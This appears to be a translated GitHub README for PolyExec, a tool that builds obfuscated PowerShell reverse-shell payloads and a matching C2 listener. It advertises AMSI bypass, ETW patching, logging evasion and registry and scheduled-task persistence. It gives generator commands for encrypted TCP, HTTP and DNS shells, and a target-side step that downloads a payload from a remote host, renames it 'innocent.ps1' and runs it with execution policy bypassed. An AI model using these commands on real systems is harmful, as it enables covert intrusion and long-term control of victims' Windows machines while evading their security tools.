sudo-st8less/PolyExec

GitHub: sudo-st8less/PolyExec

一个生成多态 PowerShell 载荷并通过加密隧道隐蔽通信的框架,专注于绕过 Windows 安全检测并建立可控 C2。

Stars: 5 | Forks: 1

## PolyExec: 生成多态 PowerShell 载荷并在 AES-256 隧道中捕获 Shell #### 在 Debian、Fedora、Windows 10、Windows 11 25H2 KB5074109 上测试通过 ##### polyexecgen.py - 生成混淆的 PS 载荷 ##### c2_catcher.py - 接收加密隧道 ### 功能特性: AES-256 加密 TCP 隧道(普通模式)
TCP 基本反向 Shell(简单)
HTTP/HTTPS(80 或 443)
DNS(隐蔽)
多会话线程化
自定义密钥
AMSI 绕过
ETW 修补
脚本块日志绕过
PRNG 变量名
垃圾代码
流量抖动
##### 安装依赖: ``` pip install -r requirements.txt ``` ##### 生成可执行文件: ``` chmod +x polyexecgen.py c2_catcher.py ``` ### PolyExec 生成用法: ##### 加密 Shell - 完全绕过: ``` ./polyexecgen.py -t 192.168.1.5 -p 6969 -m encrypted -k myg00dpassw0rd ``` ##### 基本 TCP Shell: ``` ./polyexecgen.py -t 192.168.1.5 -p 6969 -m tcp ``` ##### HTTP - 网络流量: ``` ./polyexecgen.py -t http://192.168.1.5:6969/shell -m http -k myk3y ``` ##### DNS C2(隐蔽): ``` ./polyexecgen.py -m dns --dns-domain c2.example.com ``` ### C2 Catcher 使用法: ##### (以监听特权端口... < 1024,如 443 或 80)运行,需 sudo) ##### 加密监听器: ``` $ python3 c2_catcher.py # 选择 1 用于加密监听器 # 输入加密密钥: myg00dpassw0rd (与有效载荷密钥相同) ``` #### 标准 TCP 监听器: ``` $ python3 c2_catcher.py # 选择 [2] 用于标准监听器 # 输入端口: 6969 ``` #### 配置: ``` $ python3 c2_catcher.py # 选择 3,添加主机/端口/加密设置 ``` #### 在 Windows 目标上,从主机获取并执行载荷: ``` PS C:\Users\windows> Invoke-WebRequest -Uri http://xx.xx.xx.xxx:8000/polyexec_encrypted_*.ps1 -OutFile innocent.ps1 PS C:\Users\windows> powershell.exe -ExecutionPolicy Bypass -File innocent.ps1 ```
#### 持久化: 带自动安装持久化的载荷: 写入磁盘
注册表 Run 键
登录时计划任务
文件复制到 %APPDATA%
#### 灵感借鉴自优秀的大佬: @danielbohannon
@harmj0y
@enigma0x3

标签:AES-256, AI合规, AMSI绕过, API接口, DNS 反向解析, DNS隧道, ETW旁路, HTTP隧道, IPv6, OpenCanary, PowerShell, Python, 加密隧道, 反向Shell, 变量混淆, 后门, 垃圾代码, 多态, 威胁检测, 密钥自定义, 执行框架, 数据展示, 无后门, 流量抖动, 流量混淆, 漏洞评估, 红队, 脚本块日志绕过, 逆向工具